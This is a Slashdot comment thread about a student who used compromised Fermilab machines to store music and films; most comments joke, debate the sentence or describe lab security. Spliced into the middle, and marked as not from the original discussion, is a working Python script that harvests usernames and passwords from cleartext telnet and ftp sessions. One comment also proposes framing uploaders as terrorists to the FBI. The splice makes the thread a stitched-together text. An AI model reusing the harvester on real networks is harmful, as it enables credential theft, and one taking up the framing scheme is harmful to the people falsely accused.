Fermi Lab Compromised by Pirate
tttonyyy writes "The US Department of Energy sounded a full scale alert after machines were compromised at the Fermi National Accelerator Laboratory, according to this BBC article. It turns out that the hacker was a student using the machines to download and store music and movies."
used to store MP3s and DivXs.
...
:-D
Shock Horror
Now if he'd accessed the controls for the particle accelerator and was able to spin it up, then that's news.
Worst
The China Syndrome
re*ac*tor by Neil Young
Duke Nukem Platinum Edition
Christmas at Ground Zero by Weird Al
The Atomic Cafe
Everyone's favorite video clip of Janet Jackson's right breast
Don't blame Durga. I voted for Centauri.
Um. This happened in 2002 according to the article. I think we've missed the boat on this one... the actual new information is the sentence handed down to the culprit.
++ Say to Elrond "Hello.".
Elrond says "No.". Elrond gives you some lunch.
The kid could have picked a less prominent host to save money on a hard drive.
Given that he probably did it for the self-boast rather than space, he should be roasted.
"Judge Andrew Goymer decided against sending McElroy behind bars as he had not accessed classified material on the network and had not intended to cause harm." This is quoted from the article, but in my opinion, I don't care what your intentions are; you hack into a place like that, you should be thrown in jail, even if it's just to show everyone else how serious you are.
what kind of twit takes the space at a sensitive research facility for MP3s and divx stuff? he should also count himself lucky he wasn't in the US: he'd be halfway to [remote prison facility] within hours.
serves as proof that hackers aren't necessarily smart.
ed
This hacker could have inadvertently invented cold fusion just before Morgan Freeman destroyed Chicago in an attempt to keep him from hooking up with Kate Winslet on his super-sonic 50cc Kawasaki.
I know for a fact this could have been worse. I saw it at the theater. Full price.
he gets 200 hours for hacking into a national laboratory, but will probably have to pay every last penny he owns to the RIAA and MPAA for having illegal copies of music. hrmm....
I wanted to see someone write "1 4m 1337" using an electron accelerator.
Arrr ... matey ... I reckon 'tis gold in dem particle collectors!
Seems pretty obvious that sensitive computers should be physically separated from any connection to the internet?
"Computers are an important feature of life in the 21st century," said Judge Goymer.
"Government, industry and commerce, as well as a whole variety of other institutions, depend upon the integrity and reliability of their computers in order that their proper and legitimate activities can be carried on."
And that's the problem, in a nutshell. Dependency on technology that's flawed. But neither the judge nor anyone running Fermi seems to realize this.
We need crackers because without them there would be no one to point out how incredibly vulnerable these systems really are. I'd rather have a cracker root a box to download MP3s now than have a real threat root a box and perform much more covert and dubious actions.
Obviously testing isn't enough.
Oh well. Let's lock up all those crackers. Let's keep the sploits in the hands of the real bad guys. Who cares about security.
Shame on the facility for having such weak security.
The national labs have done a good job at firewalling off the non-professionally administered machines where feasible, but the academics really don't like anything that slows down collaboration. Thus there are lots of open machines; ftp and telnet still abound and give lots of opportunities to swipe usernames/passwords in the clear even though ssh and scp are available, etc.
Most (but not all) machines running the accelerator and the detectors are on their own mostly-private subnets.
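The point above about swiping usernames and passwords in the clear is easy to demonstrate. The following is an added example, not code from the thread or from any lab: it reassembles the client side of a few hand-constructed telnet and ftp segments (no capture file is read; the records, hosts and credentials are made up for illustration) and pulls the login out of each, while the ssh session in the same data yields nothing beyond its version banner.

```python
"""Passive credential harvesting from cleartext telnet/ftp sessions.

Added example, not from the original discussion. CAPTURE is a constructed
list of TCP payload records: (session id, direction, server port, bytes).
A real sniffer would get these from a pcap; the parsing is the same.
"""
import re
from collections import defaultdict

# Constructed records. Telnet clients usually send one keystroke per
# segment, so the client stream must be reassembled before parsing.
CAPTURE = [
    ("s1", "c2s", 21, b"USER alice\r\n"),
    ("s1", "s2c", 21, b"331 Password required for alice\r\n"),
    ("s1", "c2s", 21, b"PASS hunter2\r\n"),
    ("s1", "s2c", 21, b"230 User alice logged in\r\n"),
    ("s2", "s2c", 23, b"\xff\xfd\x18login: "),           # IAC DO TERMINAL-TYPE, then prompt
] + [("s2", "c2s", 23, c) for c in (b"b", b"o", b"b", b"\r\n")] + [
    ("s2", "s2c", 23, b"Password: "),
] + [("s2", "c2s", 23, c) for c in (b"s", b"3", b"c", b"r", b"3", b"t", b"\r\n")] + [
    ("s3", "c2s", 22, b"SSH-2.0-OpenSSH_3.6.1p2\r\n"),   # only the banner is cleartext
    ("s3", "c2s", 22, b"\x00\x00\x04\x1c\x0a\x14" + bytes(range(200, 256))),
]

FTP_LOGIN = re.compile(rb"USER (\S+)\r\n(?:.*?\r\n)*?PASS (\S+)\r\n", re.S)
TELNET_PROMPT = re.compile(rb"(login|Password): ")
TELNET_IAC = re.compile(rb"\xff[\xfb-\xfe].")  # WILL/WONT/DO/DONT <option>


def reassemble(records):
    """Concatenate payloads per (session, direction, port) and strip telnet
    option negotiation so that prompts are plain text."""
    streams = defaultdict(bytearray)
    for sid, direction, port, payload in records:
        streams[(sid, direction, port)] += payload
    return {k: TELNET_IAC.sub(b"", bytes(v)) for k, v in streams.items()}


def harvest(records):
    """Return [(session, protocol, user, password)] for every session in
    which the login was recoverable; ssh sessions are listed with None."""
    streams = reassemble(records)
    found = []
    for sid, direction, port in streams:
        if direction != "c2s":
            continue
        client = streams[(sid, "c2s", port)]
        server = streams.get((sid, "s2c", port), b"")
        if port == 21:
            m = FTP_LOGIN.search(client)
            if m:
                found.append((sid, "ftp", m.group(1).decode(), m.group(2).decode()))
        elif port == 23:
            # Client lines answer the server's prompts in order.
            prompts = TELNET_PROMPT.findall(server)
            lines = client.replace(b"\r\n", b"\n").split(b"\n")
            answers = dict(zip(prompts, lines))
            if b"login" in answers and b"Password" in answers:
                found.append((sid, "telnet", answers[b"login"].decode(),
                              answers[b"Password"].decode()))
        elif port == 22:
            # Everything after the version exchange is encrypted: nothing to take.
            found.append((sid, "ssh", None, None))
    return found


if __name__ == "__main__":
    for entry in harvest(CAPTURE):
        print(entry)
```

The same reassembly works for pop3 and rlogin; the only protocol-specific part is knowing which prompt or command carries the secret.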
In a surprise announcement from Fermi Labs, it would seem that the basic building blocks of matter, created from our accelerator tests is in fact, pr0n.
In fact there seemed to be quite a lot of it in our reports, as well as some indication that the sound of the big bang was in fact a Britney Spears mp3...
Not true. I work in IT at another accelerator lab in the US, and the control network is on an entirely different network, firewalled off, MAC restricted, etc. Even the software engineers responsible for the control system have to be wired behind the firewall.
On a not unrelated note, we have been hacked several times by people uploading movies, MP3s, etc. The system was never rebuilt and the files were simply deleted. In general accelerator labs are not staffed for the super-anal security that you would expect (to say nothing of the number of MP3s, etc. that legitimate users have on the server)...
The article isn't very specific about the level of access he had gained. I'm guessing the classified information was firewalled off from the network which he broke into for its internet bandwidth. At the very least, I'd expect (false hope?) that the actual particle accelerator controls aren't accessible from any internet-connected computer.
I've worked at Fermi National Accelerator Lab (fnal.gov) for 4 years, so perhaps I could troll a bit: since they have so many Linux machines (nearly all on Internet-accessible IPs) and no firewall (recently there are some firewalled ports), this is not a unique occurrence; this happens *all* the time.
On the other hand, FermiLab does no defense/weapon work of any kind or any classified work as far as I know; a lot of people confuse it with Argonne National Lab (and be really glad Argonne wasn't named an Accelerator Lab, otherwise we'd have anal.gov).
-frin
Here's what really happened. Users in one of the labs are all given web space on a web server. Now, the IT staff is low on manpower, with government funding being diverted to the war in Iraq. So, security (among other things) is kind of lax.
Basically, McElroy ran Jack the Ripper on the password file. We're using an SGI 1400L from 1997. He got the root password, and removed the limits of his disk quota. Then, he stored a bunch of ripped DVDs and MP3s in his webspace.
Now you ask, why isn't the government making a big deal about this? They know their security policy is weak, and they just ramped it up. The 'alert' is really just a few days for them to get things back the way they should be. If they said "well, we won't prosecute him because if people really know what happened, it'd make us look bad", what would the American public (and rest of the world) think?!
It could have been worse. He could have been caught smuggling atoms out of the place in his pockets.
"See? He's got atoms in his pockets! Call the local constabulary, Smithers!"
It sounds like he was just a student who had access to those machines. Does knowing the root password make you a hacker?
How about a new headline: Student abuses Lab's computers.
heh, do you really think you can /. the bbc?
Have a look here to see their traffic. Totals are here. They can handle 2 GB/sec. That's some monster pipe, and it will take some severe slashdotting.
On the count of three, hit refresh like a mofo. If all 600,000 of us do it we might just create a tiny lump on that graph.
You deserve a head exam. Think here - how many people really believe that the control system for the collider is housed on a machine that was compromised (and is thus exposed to the internet at large)? Admittedly, there's a chance, but no moron would set up a network in this way. And who believes there aren't HARDWARE issues that would prevent an explosion - maybe even safeguards? What a freakin thought, considering this is a US DOE site. And what is this toxic material? The collider is basically a bunch of metal. Not sure what he'd overload, but usually heavy atoms or light atoms are slammed together to see what happens and measure particle/energy emissions. Where's the toxic material and explosive?
Oh, and what villages? They're 45 miles outside Chicago - not the smallest place. Don't worry though. Unless top quarks, CP violation experiments, and Boson experimentation threaten explosion, I think we're ok. Just try researching the subject. "fermilab" I'm feeling lucky gets you there.
That's not to say that massive damage/downtime can't be done by breaking into the right machines.
This happened last year; he's only just been sentenced (by the British, not the Americans). And this had nothing to do with the Patriot Act. The reason he chose Fermi Labs is that he mistakenly thought it was an academic facility and so would not pay bandwidth fees (unis etc. in England don't pay for bandwidth).
I'm not condoning his actions, just trying to clear up some of the FUD
Sorry but the Large Hadron Collider is being built at CERN in Europe. It is not at Fermilab, and even if it were the "controls" for it would not be on the same network as the experiments, each of which would have its own authentication hosts, etc. anyway.
Mod this insightful.
Kids need to learn that downloading is not entirely free. You could have done something constructive in the time it takes you to cozy up to some release group on IRC, find a usable pub, looking for fills, fixing files with CRC errors, etc.
Not to mention the obsessive compulsive facet of downloading where you feel a need to keep your machine downloading at all times for fear of letting perfectly good bandwidth go to waste, at which point you go out to scour the net for something -- anything -- to download.
It is a big time commitment and, like channel surfing, hours fly by like minutes without you having seen anything interesting.
Or so I heard...
There are thousands of computers at Fermilab, the vast majority of which are desktop workstations running Linux (logins are through Kerberos). Being your typical office computers sitting on a desk, they are connected to the internet via fairly high bandwidth. As we know, the WWW was invented in order for high-energy physicists to share data throughout the world, so not only does it not make sense for these machines to be cut off from the internet, it is an essential part of scientific research. Any machine that actually controls an aspect of an experiment (connected to any sort of particle accelerator or detector) is not likely to be connected to the internet.
So, yes, physicists and other scientists do depend on flawed technology, mostly because it's the easiest way to be able to keep connected when you're dealing with large collaborations stretched across the world. The downside may be the occasional kid (wrongfully) taking advantage of a desktop machine attached to a T1 line. Where security is more vital, it is present. But it's simply impossible to ensure that everyone's desktop machine is secure or not.
Not always the case. The Muskegon, Michigan water filtration plant has its control computers on the network that has internet access so the paranoid supervisor can pcAnywhere in to spy on his employees. They have been infected several times with random viruses and trojans only because the idiot in charge of the plant won't listen to experts that that kind of stuff needs to be isolated.
one medium skilled cracker could easily cause insane damage/havoc by getting into those systems.
does the management care? nope. and if this is for a important thing like a water filtration plant, there is a very GOOD chance that their "critical" systems are just as open.
Important systems need to be disconnected completely. There is no reason to read your email or surf the net on the control PCs.
Do not look at laser with remaining good eye.
Southwark Crown Court waived a demand for 21,000 in damages as it ruled that McElroy could not pay the fine.
That is the fine by Britain. I wonder what British law he broke??
But he obviously broke USA law. I wonder if the FBI can arrest him and force his export.
I do not understand the culture of people thinking that they own everything. What gave this guy the right to steal bandwidth from someone else? What gave him the right to steal the storage space? What gave him the right to break into someone else's PC?
The answer is tougher laws and more extradition treaties. And by comparison, whatever happened to that Filipino kid who was caught writing viruses? I thought they threw the book at him. Why will the British kid get an easier sentence?
Rosco: "If brains were gunpowder, Enos couldn't blow his nose."
Is "community service" really really punishing or something? They were going to fine him 21,000 dollars, but instead chose to give him 200 hours of community service... That's $105 an hour.. can I find some community service like that? Please?
If you can read this, you are most likely close enough.
There is no "classified" information at Fermilab, other than payroll information, HR documents, etc. It's a purely scientific, basic energy laboratory.
While we're on the topic of particle accelerators, mark your calendars for 2007 -- that's when the Large Hadron Collider will be completed in Switzerland, marking a significant step forward in particle physics.
Here's a brief description from the CERN website:
What is LHC? The Large Hadron Collider (LHC) is a particle accelerator which will probe deeper into matter than ever before. Due to switch on in 2007, it will ultimately collide beams of protons at an energy of 14 TeV . Beams of lead nuclei will be also accelerated, smashing together with a collision energy of 1150 TeV.
A TeV is a unit of energy used in particle physics. 1 TeV is about the energy of motion of a flying mosquito. What makes the LHC so extraordinary is that it squeezes energy into a space about a million million times smaller than a mosquito.
The LHC is the next step in a voyage of discovery which began a century ago. Back then, scientists had just discovered all kinds of mysterious rays, X-rays, cathode rays, alpha and beta rays. Where did they come from? Were they all made of the same thing, and if so what? These questions have now been answered, giving us a much greater understanding of the Universe. Along the way, the answers have changed our daily lives, giving us televisions, transistors, medical imaging devices and computers. On the threshold of the 21st century, we face new questions which the LHC is designed to address. Who can tell what new developments the answers may bring?
the people in charge of the security at the lab?
Which do you consider more dangerous:
#1 Script Kiddie being hacking server to store films on.
#2 Running a nuclear lab with so little security a script kiddie can break in.
As a Pirate-American, I take offense at the use of the term "pirate" for a simple hacker or cracker. Where are his sea legs, his parrot/monkey, his eye patch or pegleg?
I'm not defending that little hacker guy (erm, what kind of hacker is he anyway exploiting a known weakness to gain bandwidth and storage for MP3 and DivX files... I'd rather make him manually punch one of these files into punch tape instead of those 200 hours civil service which he might find even interesting), but if you run a high-security network infrastructure, then you better be up-to-date with the latest patches and countermeasures. It's not done with applying the latest IE "security update" every Tuesday...
Now calling for a more drastic punishment and considering the current (IMO fair) one as a green light just shows what's wrong with some people: if hijacking company computers and networks for bandwidth and storage abuse becomes an increasingly common practice in the online world, then those "security experts" should probably do their homework and fix the systems instead of calling the cops.
If you leave your car open and someone steals your car hifi, it's entirely your fault. (Go ask your insurance...) Whose car it is shouldn't play a role when sentencing the thief.
Fermi Lab Compromised by Pirate
Damn it. I was expecting a bit of coastal raiding action from this story. Maybe black flags with the skull and crossbones. A little rapine and pillaging of the Fermi Lab.
Damn corruption of the English language.
Why does everybody seem to think that Fermilab is some kind of sensitive facility? News flash: Fermilab is a basic research facility, not a top secret weapons lab. Their security is lax because they really don't have anything to hide. All their results are available to the public anyway. After all, that is sort of the whole point of basic research. And it's not like the compromised computer was part of the control system or anything. Fermilab has a lot of computers. The place is huge.
Besides which, if you actually read about the case you'd realize that this guy had access to the computers anyway and all he did was crack the root password to increase his disk quota. Now, I'm not saying that's a good thing but it's more like abuse of a computer lab than anything.
Physics is good
Have a look here to see their traffic. Totals are here. They can handle 2gb/sec.
McElroy's note to self: next time store music and video on BBC computers, not FermiLab.
Ooh, a sarcasm detector. Oh, that's a real useful invention.
This Just In...
Fermi Labs announced the production of a new supersized sub-atomic particle, boxons. Boxons were created by smashing oxygen with bosons (another sub-atomic particle).
Examined through the most powerful microscope in the world, the boxon appears to be a cardboard box, with the words "Schrödinger's Cat" written on the side. Sadly, the box is empty.
It's funny that the article made so many claims about how fiercely the DoE closed things down at the lab, and how they oversee nuclear weapons and such. Yes, Fermilab is funded by the DoE, and so they fall under the same rules for terrorist paranoia. But the lab has an extremely small amount of radioactive material on site. Mostly it's just small check sources and such for testing detectors. There are some slightly stronger sources for testing calorimeters, and I think there's even a tiny amount of uranium, but not even close to a critical mass of the stuff. They do not have a nuclear reactor on site. No weapons research is being done there, only particle physics with the accelerator, with a bit of astrophysics and neutron therapy on the side.
Fermilab has really been suffering from tighter restrictions since 9/11. They have a lot of community outreach programs, but these days it's not as easy for the public to visit the lab. They still can, but have to jump through a hoop or two. It's really too bad. It used to be completely open, and folks would often be seen fishing, hiking the prairie, or watching the geese and buffalo.
As for "confidential" material that a hacker could access -- The experiments are publicly funded and the data is all, technically, publicly available. But in practice the data from the various experiments is generally kept somewhat secure just so that physicists on competing experiments have a hard time "stealing" the data. But honestly, in order to make any sense at all of this kind of data you'll need a hundred people with an intimate knowledge of the experiment spending a few years on analysis. All experimental results are published in journals and are freely available on the web.
As for tampering with the data, well that's possible but to influence anything you'd have to be impossibly clever and hack systematic changes into tens of TB of raw data, which would require figuring out how it's packed, what it all means, and knowing enough physics to search for events and adjusting things accordingly. For any single individual, that's just impossible.
As for controlling the accelerator, that's ridiculous too. First of all, there is a lot of analog electronics controlling the thing in addition to the computers, and it requires a sizeable team of scientists to operate. I'm sure that someone could cause troubles if they wanted, but never any damage. The worst that could happen is for a magnet in the Tevatron to overheat and no longer superconduct. When that happens the magnet boils off a lot of liquid helium as a protective measure, and the beam wrecks into the sides of the beampipe. This happens every few weeks anyway, without the help of hackers. There is nothing dangerous you could do with the beam, aside from entering the tunnel and sticking your head near it. And to do that you have to cleverly defeat all the interlocks. I've even seen a curious colony of ants trip the interlocks, shutting down the accelerator for a couple of hours.
The lab is big on security simply because it's funded by the DoE. There's no other good reason for it. It DOES tend to be a target for hackers because they have lots of computers, mostly running Linux (with pockets of AIX, IRIX, Solaris, OSF1, and VMS), and (forgive me) the computing staff really means well but often screws up. Nothing is a "decision", it's always a "policy". They have gone with Kerberos and some crypto-card thing which is entirely insecure. They must have known about the possible exploits of the crypto-card system years ago, as I knew someone who figured out a couple (very easily) and was trying to let the Fermilab computing group know about it in the best way. I think the blame lies in trying to keep telnet ports open for people who need to log in remotely from computers running Windows that do not have an SSH client installed.
I've posted this unpopular sentiment before and I guess I am still on the pedestal.
Those machines, and many others, are just as open to our enemies, the likes of which include Osama Bin Laden, Saddam Hussein (before he was captured) and many others. Had they cracked in (which they may well have done and may well be doing), the machines would probably not be used as a receptacle for kiddie porn.
Were it not for kids that are just mucking about poking their collective digits where the authorities would rather not be poked - our authorities would remain FAT DUMB and HAPPY dreaming their collective bliss.
We live in the real world where we have many real enemies. We need secure systems that we can count on. Each time some kid pokes his finger into a vulnerable spot it helps to educate the masses that they really do need to pay attention.
Perhaps the judge in this case realises this. 200 hours is a suitable punishment, even if it is perhaps a little severe.
One thing that I think needs to be recognised is that there are many would-be very competent systems admins who frequent Slashdot. Many of these people would relish a well-paying job and could be gainfully employed closing these security holes. Perhaps our authorities and Joe Sixpack in general should open their eyes and smell the coffee here.
On a not unrelated note, we have been hacked several times by people uploading movies, MP3s, etc. The system was never rebuilt and the files were simply deleted.
Evil solution: Take MP3s, DivXs, etc.; modify them to include very badly 'hidden' steganographic information that looks like it came from terrorists. Replace originals. Wait for uploaders to download them again. Anonymously tip-off FBI that said h4x0r may be involved in terrorism. FBI search their hard drives, shit hits the fan.
Step 3- Profit! Oh, hang on- that's the one thing you *don't* get out of this method.
"Slashdot - News and Chat Sites Deviant". (Click "homepage" link above for details).
First of all, it is not possible to log into any service at Fermilab without a Kerberos principal. ftp and telnet are not permitted, and there is an active security team that scans ports on a continuous basis and will shut down any offending machine. There is no firewall because all traffic must be either outgoing web and data services or kerberized if incoming.
I have personally seen Windows machines shut down within minutes and their wireless cards confiscated when brought onto the site if a virus is detected. These scans are not optional to the user and are automatically performed. The fact that this user was caught and security tightened to prevent recurrences is proof that there is good security there. The comments above are almost all completely uneducated.
Finally, as noted above by some (few) intelligent readers, the story is old and is really about sentencing. there has been no recent compromise.
Troll-prevention note and disclaimer: For those who think the above or the story itself is an invitation to hack, I can point out that several such attempts occur per day, keeping the security team busy and alert, but that essentially all of them fail and the rare successful ones earn the attention of the FBI.
At least at Brookhaven NL, all the computers have a paragraph at login, "WARNING: The system you are using is property of the Department of Energy, it's not for use beyond your job, unauthorized access == crucifixion, yadda yadda"... you'd have to be beyond retarded to not realize you're where you're not supposed to be. Machines on the internal network don't usually have .gov hostnames, though - just an IP, or the machine name.
Facts do not cease to exist because they are ignored. - Aldous Huxley
More interesting than the actual act of hacking into a US DoE network is the legal precedent set by the Judge in the UK. Although he found the kid guilty and sentenced him to 200 hours of community service, he failed to make him pay the roughly $38,000 in damages he cost the DoE as they took 17 computers down for 3 days to clean up the mess he made.
According to CNN http://www.cnn.com/2004/TECH/internet/02/03/britain.hacker.reut/index.html the justification for failing to make the kid pay the actual financial damages he caused was that no classified information was compromised. This sets a legal precedent that is simply outstanding for budding young international hackers both in the US and the UK, because it means that as long as they do not compromise classified information, they can cause as much financial loss as they want and not be held liable for it beyond public service outside of the country they caused the damage in. For US script kiddies, this should mean that if they're caught hacking into UK government systems, the UK government should not ask the US to recover any financial damages unless classified information was compromised.
See, the US and UK really ARE allies in the war against... ummm... are we FOR or AGAINST script kiddies this week?
Nothing.
Nothing, aside from the notoriety of this trial, which may not even follow him that far - a Google search on his name (Joseph McElroy) doesn't even turn up stuff referring to him in the first page. (That's what he gets for sharing his name with a famous author.)
The judge decided against jail time because "he had not accessed classified material on the network and had not intended to cause harm". Also, the monetary claim for damages against him was waived on the grounds that he wouldn't be able to pay it.
"not intended to cause harm"? "not intended to cause harm"? Tell me, can I bypass the metal detectors at Heathrow simply because I'm not carrying any weapons, and even if I were, intend to cause no harm with them? What if I just want to drive to the store and back, but would rather hotwire your car instead of walking?
Sure, I understand that the US has some truly brutal criminal trespass laws that are probably way out of proportion to the act they supposedly punish, and that therefore a UK judge might be more lenient in this case than a US one would, but... nothing?
First off, thanks for writing this. I used to be the lead of the UNIX admin team at FERMILAB quite a few years ago. The people who've been writing all this drivel need to remember that FERMI has fewer "secrets" to hide from people than just about any small business has. Oh, they have a lot of stuff that one team of scientists would just as soon the others didn't see till they publish it, but nothing classified.
As to taking over the accelerator (let's just ignore the fact that the Hadron collider is on a different continent and not running yet) - you've obviously never watched a whole bunch of particle physicists spend a week trying to get something resembling a usable beam out of the accelerator. It's not like there's a "destroy the world" button on a web site. And trust me, that stuff isn't Internet accessible.
I also don't think that people understand that computer security at a site of this type is a continual battle over the security=1/convenience rule. The physicist-users want convenience. The computing staff wants security - it's pretty much like anywhere else. I was still having arguments with experimenters who didn't want to have passwords while I was there. I'm sure it's only somewhat better now.
You have to remember that FERMILAB is much more like a graduate school in many ways than it is a secure classified site.
I do not understand the culture of people thinking that they own everything. What gave this guy the right to steal bandwith from someone else? What gave him the right to steal the storage space? What gave him the right to break into someone elses pc?
He's a script kiddie who stored some mp3s and movies on a poorly-secured machine in an unclassified lab.
He used some bandwidth and storage space for his personal convenience. He didn't delete anyone's files, set up a spam relay, break into (or try to break into) more sensitive systems, or do any real harm. At worst, he should be on the hook for bandwidth costs and a nominal charge for the use of storage space; he also owes some apologies.
He's a not-particularly-bright college kid who didn't cause any lasting harm, nor physical injury.
So--would it be appropriate to take from this kid the years of his life that extradition, an American trial, and the American prison system would take...for downloading some mp3s? Is it worth the cost of transporting him, housing him, and trying him?
Don't you think the FBI should have better things to do? They won't generally get involved even in the United States unless a million dollars or a kidnapping are involved.
~Idarubicin
Here's the lesson:
Hacking into a national research laboratory with a particle accelerator, attempting to unlock the secrets of the universe = 200 hours community service
Hacking into a Fortune 500 company, with a dedicated legal team and a public image to maintain = 3-5 years in a federal pound-you-in-the-ass prison.
Are we taking notes?
-Hentai [in vita non pacem est]
Hacking into a national research laboratory with a particle accelerator, attempting to unlock the secrets of the universe = 200 hours community service
Hacking into a Fortune 500 company, with a dedicated legal team and a public image to maintain = 3-5 years in a federal pound-you-in-the-ass prison.
Logging onto Kazaa to download the latest Britteny Spears album........priceless